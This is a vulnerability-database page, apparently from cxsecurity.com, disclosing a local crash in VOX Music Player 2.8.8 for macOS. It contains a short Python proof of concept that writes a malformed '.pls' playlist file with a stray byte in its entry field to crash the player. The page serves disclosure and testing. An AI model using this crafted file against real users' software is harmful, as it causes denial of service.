VOX Music Player 2.8.8 Denial Of Service

2016.10.14
Credit: Antonio Z.
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: VOX Music Player 2.8.8 '.pls' Local Crash PoC # Date: 10-12-2016 # Exploit Author: Antonio Z. # Vendor Homepage: http://coppertino.com/vox/mac/ # Software Link: http://dl.devmate.com/com.coppertino.Vox/Vox.dmg # Version: 2.8.8 # Tested on: OS X 10.10, OS X 10.11, OS X 10.12 import os evil = '\x90' pls = '[playlist]\n' + 'NumberOfEntries=1\n' +'File1' + evil + '\n' + 'Title1=\n' + 'Length1=-1\n' file = open('Local_Crash_PoC.pls', 'wb') file.write(pls) file.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top